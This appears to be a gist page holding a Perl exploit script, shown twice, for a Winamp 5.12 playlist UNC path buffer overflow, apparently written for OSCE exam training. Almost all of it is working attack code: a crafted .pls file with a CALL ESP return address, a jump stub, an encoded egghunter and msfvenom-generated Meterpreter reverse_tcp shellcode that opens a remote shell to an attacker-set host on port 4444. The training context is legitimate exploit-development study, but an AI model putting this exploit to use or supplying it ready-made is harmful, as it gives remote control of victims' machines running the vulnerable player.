mgeeky/winamp-5.12-unc-exploit.pl

## winamp-5.12-unc-exploit.pl
#!/usr/bin/perl -w
# ====================================================================
# Winamp 5.12 Playlist UNC Path Computer Name Overflow Perl Exploit
# Original Poc by Umesh Wanve (umesh_345@yahoo.com)
# Exploit crafted by Mariusz B. / mgeeky (for occassion of OSCE/CTP, 2017)
# ====================================================================

$start = "[playlist]\r\nFile1=\\\\";

$egg = "T00WT00W";

# 0x0202d961 CALL ESP ; module: in_mp3.dll, Non-ASLR, Non-NX, Non-Rebase
$retaddr = "\x61\xd9\x02\x02";

#
# Stage1: sub esp, 58; sub esp, 58; jmp esp - Jumps to the egghunter / stage2
#
$stage1 = "\x83\xec\x58\x83\xec\x58\xff\xe4";
$stage1 .= "\x90" x (11 - length($stage1));

#
# Stage 2: Alphanumeric encoded Egghunter (original version, by Matt Miller). Egg: W00TW00T
#
$stage2 = "\x89\xe7\xdd\xc4\xd9\x77\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a" .
"\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59" .
"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" .
"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" .
"\x75\x4a\x49\x31\x76\x6f\x71\x7a\x6a\x59\x6f\x66\x6f\x42" .
"\x62\x61\x42\x42\x4a\x35\x52\x52\x78\x7a\x6d\x46\x4e\x67" .
"\x4c\x34\x45\x53\x6a\x73\x44\x68\x6f\x48\x38\x52\x74\x70" .
"\x30\x54\x70\x56\x37\x6c\x4b\x48\x7a\x4c\x6f\x72\x55\x48" .
"\x6a\x4e\x4f\x30\x75\x59\x77\x49\x6f\x6a\x47\x6a\x30\x41\x41";
$stage2 .= "\x90" x (166 - length($stage2));

#
# Stage 3: Alphanumeric encoded meterpreter on reverse tcp.
#
$stage3 = $egg;

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.XXX LPORT=4444 -e x86/alpha_mixed -f pl
$stage3 .= "\x90\x90\x90\x90" .
"\x89\xe6\xdd\xc0\xd9\x76\xf4\x5d\x55\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x6b\x4c\x59\x78\x6b\x32\x67\x70\x67\x70" .
"\x77\x70\x65\x30\x4d\x59\x58\x65\x35\x61\x4f\x30\x52\x44" .
"\x4e\x6b\x66\x30\x56\x50\x4c\x4b\x63\x62\x54\x4c\x4e\x6b" .
"\x42\x72\x77\x64\x6e\x6b\x73\x42\x36\x48\x46\x6f\x78\x37" .
"\x30\x4a\x34\x66\x74\x71\x69\x6f\x4e\x4c\x45\x6c\x43\x51" .
"\x63\x4c\x74\x42\x66\x4c\x71\x30\x4f\x31\x7a\x6f\x34\x4d" .
"\x33\x31\x4a\x67\x6a\x42\x6b\x42\x51\x42\x31\x47\x6c\x4b" .
"\x31\x42\x36\x70\x4e\x6b\x42\x6a\x75\x6c\x6e\x6b\x62\x6c" .
"\x52\x31\x33\x48\x4a\x43\x62\x68\x63\x31\x58\x51\x46\x31" .
"\x6c\x4b\x70\x59\x75\x70\x46\x61\x69\x43\x4c\x4b\x67\x39" .
"\x67\x68\x79\x73\x54\x7a\x42\x69\x4e\x6b\x64\x74\x6c\x4b" .
"\x37\x71\x48\x56\x64\x71\x79\x6f\x4e\x4c\x6b\x71\x5a\x6f" .
"\x76\x6d\x53\x31\x49\x57\x70\x38\x6b\x50\x42\x55\x5a\x56" .
"\x43\x33\x73\x4d\x68\x78\x35\x6b\x61\x6d\x36\x44\x63\x45" .
"\x7a\x44\x61\x48\x6e\x6b\x71\x48\x56\x44\x37\x71\x6b\x63" .
"\x32\x46\x6c\x4b\x56\x6c\x62\x6b\x6c\x4b\x63\x68\x47\x6c" .
"\x77\x71\x6b\x63\x4e\x6b\x47\x74\x6e\x6b\x36\x61\x6e\x30" .
"\x6b\x39\x50\x44\x65\x74\x54\x64\x33\x6b\x31\x4b\x31\x71" .
"\x32\x79\x62\x7a\x42\x71\x4b\x4f\x59\x70\x61\x4f\x63\x6f" .
"\x71\x4a\x4c\x4b\x57\x62\x38\x6b\x4e\x6d\x71\x4d\x35\x38" .
"\x50\x33\x35\x62\x77\x70\x67\x70\x31\x78\x54\x37\x73\x43" .
"\x45\x62\x53\x6f\x30\x54\x70\x68\x50\x4c\x42\x57\x31\x36" .
"\x53\x37\x6b\x4f\x6e\x35\x38\x38\x4e\x70\x47\x71\x43\x30" .
"\x33\x30\x37\x59\x68\x44\x62\x74\x50\x50\x71\x78\x61\x39" .
"\x6f\x70\x70\x6b\x37\x70\x79\x6f\x39\x45\x31\x7a\x46\x65" .
"\x33\x58\x6f\x30\x79\x38\x73\x54\x35\x67\x45\x38\x54\x42" .
"\x77\x70\x77\x61\x43\x6c\x6e\x69\x78\x66\x76\x30\x32\x70" .
"\x66\x30\x56\x30\x37\x30\x32\x70\x37\x30\x56\x30\x32\x48" .
"\x68\x6a\x54\x4f\x6b\x6f\x6d\x30\x59\x6f\x79\x45\x6c\x57" .
"\x71\x7a\x34\x50\x71\x46\x50\x57\x73\x58\x4d\x49\x59\x35" .
"\x71\x64\x55\x31\x49\x6f\x7a\x75\x4b\x35\x79\x50\x73\x44" .
"\x56\x6a\x49\x6f\x42\x6e\x66\x68\x31\x65\x4a\x4c\x5a\x48" .
"\x70\x61\x65\x50\x73\x30\x65\x50\x71\x7a\x67\x70\x71\x7a" .
"\x77\x74\x33\x66\x33\x67\x30\x68\x77\x72\x6e\x39\x58\x48" .
"\x73\x6f\x79\x6f\x39\x45\x6c\x43\x68\x78\x77\x70\x73\x4e" .
"\x76\x56\x4e\x6b\x66\x56\x42\x4a\x37\x30\x35\x38\x43\x30" .
"\x44\x50\x57\x70\x73\x30\x56\x36\x43\x5a\x47\x70\x63\x58" .
"\x70\x58\x4f\x54\x70\x53\x4d\x35\x79\x6f\x68\x55\x6c\x53" .
"\x30\x53\x30\x6a\x37\x70\x52\x76\x63\x63\x46\x37\x52\x48" .
"\x55\x52\x48\x59\x5a\x68\x71\x4f\x39\x6f\x7a\x75\x4f\x73" .
"\x59\x68\x57\x70\x61\x6d\x46\x42\x33\x68\x35\x38\x75\x50" .
"\x33\x70\x33\x30\x75\x50\x50\x6a\x45\x50\x30\x50\x75\x38" .
"\x44\x4b\x66\x4f\x56\x6f\x50\x30\x59\x6f\x69\x45\x32\x77" .
"\x73\x58\x44\x35\x62\x4e\x42\x6d\x45\x31\x79\x6f\x4b\x65" .
"\x31\x4e\x53\x6e\x39\x6f\x56\x6c\x47\x54\x4a\x49\x51\x61" .
"\x39\x6f\x39\x6f\x49\x6f\x73\x31\x6a\x63\x71\x39\x6a\x66" .
"\x70\x75\x68\x47\x49\x53\x4d\x6b\x48\x70\x6f\x45\x4d\x72" .
"\x51\x46\x50\x6a\x37\x70\x52\x73\x69\x6f\x78\x55\x41\x41";

$stage3 .= "\x90" x (856 - length($stage3));

$end = "\r\nTitle1=pwnd\r\nLength1=512\r\nNumberOfEntries=1\r\nVersion=2\r\n";

die "Stage1 is of wrong length" unless (length($stage1) ==  11);
die "Stage2 is of wrong length" unless (length($stage2) == 166);
die "Stage3 is of wrong length" unless (length($stage3) == 856);

open (MYFILE, '>exploit.pls');
print MYFILE $start;
print MYFILE $stage3;
print MYFILE $stage2;
print MYFILE $retaddr;
print MYFILE $stage1;
print MYFILE $end;
close (MYFILE);

# Entire 'exploit.pls' file has to take 1121 bytes.
	#!/usr/bin/perl -w
	# ====================================================================
	# Winamp 5.12 Playlist UNC Path Computer Name Overflow Perl Exploit
	# Original Poc by Umesh Wanve (umesh_345@yahoo.com)
	# Exploit crafted by Mariusz B. / mgeeky (for occassion of OSCE/CTP, 2017)
	# ====================================================================

	$start = "[playlist]\r\nFile1=\\\\";

	$egg = "T00WT00W";

	# 0x0202d961 CALL ESP ; module: in_mp3.dll, Non-ASLR, Non-NX, Non-Rebase
	$retaddr = "\x61\xd9\x02\x02";

	#
	# Stage1: sub esp, 58; sub esp, 58; jmp esp - Jumps to the egghunter / stage2
	#
	$stage1 = "\x83\xec\x58\x83\xec\x58\xff\xe4";
	$stage1 .= "\x90" x (11 - length($stage1));

	#
	# Stage 2: Alphanumeric encoded Egghunter (original version, by Matt Miller). Egg: W00TW00T
	#
	$stage2 = "\x89\xe7\xdd\xc4\xd9\x77\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a" .
	"\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59" .
	"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" .
	"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" .
	"\x75\x4a\x49\x31\x76\x6f\x71\x7a\x6a\x59\x6f\x66\x6f\x42" .
	"\x62\x61\x42\x42\x4a\x35\x52\x52\x78\x7a\x6d\x46\x4e\x67" .
	"\x4c\x34\x45\x53\x6a\x73\x44\x68\x6f\x48\x38\x52\x74\x70" .
	"\x30\x54\x70\x56\x37\x6c\x4b\x48\x7a\x4c\x6f\x72\x55\x48" .
	"\x6a\x4e\x4f\x30\x75\x59\x77\x49\x6f\x6a\x47\x6a\x30\x41\x41";
	$stage2 .= "\x90" x (166 - length($stage2));

	#
	# Stage 3: Alphanumeric encoded meterpreter on reverse tcp.
	#
	$stage3 = $egg;

	# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.XXX LPORT=4444 -e x86/alpha_mixed -f pl
	$stage3 .= "\x90\x90\x90\x90" .
	"\x89\xe6\xdd\xc0\xd9\x76\xf4\x5d\x55\x59\x49\x49\x49\x49" .
	"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
	"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
	"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
	"\x42\x75\x4a\x49\x6b\x4c\x59\x78\x6b\x32\x67\x70\x67\x70" .
	"\x77\x70\x65\x30\x4d\x59\x58\x65\x35\x61\x4f\x30\x52\x44" .
	"\x4e\x6b\x66\x30\x56\x50\x4c\x4b\x63\x62\x54\x4c\x4e\x6b" .
	"\x42\x72\x77\x64\x6e\x6b\x73\x42\x36\x48\x46\x6f\x78\x37" .
	"\x30\x4a\x34\x66\x74\x71\x69\x6f\x4e\x4c\x45\x6c\x43\x51" .
	"\x63\x4c\x74\x42\x66\x4c\x71\x30\x4f\x31\x7a\x6f\x34\x4d" .
	"\x33\x31\x4a\x67\x6a\x42\x6b\x42\x51\x42\x31\x47\x6c\x4b" .
	"\x31\x42\x36\x70\x4e\x6b\x42\x6a\x75\x6c\x6e\x6b\x62\x6c" .
	"\x52\x31\x33\x48\x4a\x43\x62\x68\x63\x31\x58\x51\x46\x31" .
	"\x6c\x4b\x70\x59\x75\x70\x46\x61\x69\x43\x4c\x4b\x67\x39" .
	"\x67\x68\x79\x73\x54\x7a\x42\x69\x4e\x6b\x64\x74\x6c\x4b" .
	"\x37\x71\x48\x56\x64\x71\x79\x6f\x4e\x4c\x6b\x71\x5a\x6f" .
	"\x76\x6d\x53\x31\x49\x57\x70\x38\x6b\x50\x42\x55\x5a\x56" .
	"\x43\x33\x73\x4d\x68\x78\x35\x6b\x61\x6d\x36\x44\x63\x45" .
	"\x7a\x44\x61\x48\x6e\x6b\x71\x48\x56\x44\x37\x71\x6b\x63" .
	"\x32\x46\x6c\x4b\x56\x6c\x62\x6b\x6c\x4b\x63\x68\x47\x6c" .
	"\x77\x71\x6b\x63\x4e\x6b\x47\x74\x6e\x6b\x36\x61\x6e\x30" .
	"\x6b\x39\x50\x44\x65\x74\x54\x64\x33\x6b\x31\x4b\x31\x71" .
	"\x32\x79\x62\x7a\x42\x71\x4b\x4f\x59\x70\x61\x4f\x63\x6f" .
	"\x71\x4a\x4c\x4b\x57\x62\x38\x6b\x4e\x6d\x71\x4d\x35\x38" .
	"\x50\x33\x35\x62\x77\x70\x67\x70\x31\x78\x54\x37\x73\x43" .
	"\x45\x62\x53\x6f\x30\x54\x70\x68\x50\x4c\x42\x57\x31\x36" .
	"\x53\x37\x6b\x4f\x6e\x35\x38\x38\x4e\x70\x47\x71\x43\x30" .
	"\x33\x30\x37\x59\x68\x44\x62\x74\x50\x50\x71\x78\x61\x39" .
	"\x6f\x70\x70\x6b\x37\x70\x79\x6f\x39\x45\x31\x7a\x46\x65" .
	"\x33\x58\x6f\x30\x79\x38\x73\x54\x35\x67\x45\x38\x54\x42" .
	"\x77\x70\x77\x61\x43\x6c\x6e\x69\x78\x66\x76\x30\x32\x70" .
	"\x66\x30\x56\x30\x37\x30\x32\x70\x37\x30\x56\x30\x32\x48" .
	"\x68\x6a\x54\x4f\x6b\x6f\x6d\x30\x59\x6f\x79\x45\x6c\x57" .
	"\x71\x7a\x34\x50\x71\x46\x50\x57\x73\x58\x4d\x49\x59\x35" .
	"\x71\x64\x55\x31\x49\x6f\x7a\x75\x4b\x35\x79\x50\x73\x44" .
	"\x56\x6a\x49\x6f\x42\x6e\x66\x68\x31\x65\x4a\x4c\x5a\x48" .
	"\x70\x61\x65\x50\x73\x30\x65\x50\x71\x7a\x67\x70\x71\x7a" .
	"\x77\x74\x33\x66\x33\x67\x30\x68\x77\x72\x6e\x39\x58\x48" .
	"\x73\x6f\x79\x6f\x39\x45\x6c\x43\x68\x78\x77\x70\x73\x4e" .
	"\x76\x56\x4e\x6b\x66\x56\x42\x4a\x37\x30\x35\x38\x43\x30" .
	"\x44\x50\x57\x70\x73\x30\x56\x36\x43\x5a\x47\x70\x63\x58" .
	"\x70\x58\x4f\x54\x70\x53\x4d\x35\x79\x6f\x68\x55\x6c\x53" .
	"\x30\x53\x30\x6a\x37\x70\x52\x76\x63\x63\x46\x37\x52\x48" .
	"\x55\x52\x48\x59\x5a\x68\x71\x4f\x39\x6f\x7a\x75\x4f\x73" .
	"\x59\x68\x57\x70\x61\x6d\x46\x42\x33\x68\x35\x38\x75\x50" .
	"\x33\x70\x33\x30\x75\x50\x50\x6a\x45\x50\x30\x50\x75\x38" .
	"\x44\x4b\x66\x4f\x56\x6f\x50\x30\x59\x6f\x69\x45\x32\x77" .
	"\x73\x58\x44\x35\x62\x4e\x42\x6d\x45\x31\x79\x6f\x4b\x65" .
	"\x31\x4e\x53\x6e\x39\x6f\x56\x6c\x47\x54\x4a\x49\x51\x61" .
	"\x39\x6f\x39\x6f\x49\x6f\x73\x31\x6a\x63\x71\x39\x6a\x66" .
	"\x70\x75\x68\x47\x49\x53\x4d\x6b\x48\x70\x6f\x45\x4d\x72" .
	"\x51\x46\x50\x6a\x37\x70\x52\x73\x69\x6f\x78\x55\x41\x41";

	$stage3 .= "\x90" x (856 - length($stage3));

	$end = "\r\nTitle1=pwnd\r\nLength1=512\r\nNumberOfEntries=1\r\nVersion=2\r\n";

	die "Stage1 is of wrong length" unless (length($stage1) == 11);
	die "Stage2 is of wrong length" unless (length($stage2) == 166);
	die "Stage3 is of wrong length" unless (length($stage3) == 856);

	open (MYFILE, '>exploit.pls');
	print MYFILE $start;
	print MYFILE $stage3;
	print MYFILE $stage2;
	print MYFILE $retaddr;
	print MYFILE $stage1;
	print MYFILE $end;
	close (MYFILE);

	# Entire 'exploit.pls' file has to take 1121 bytes.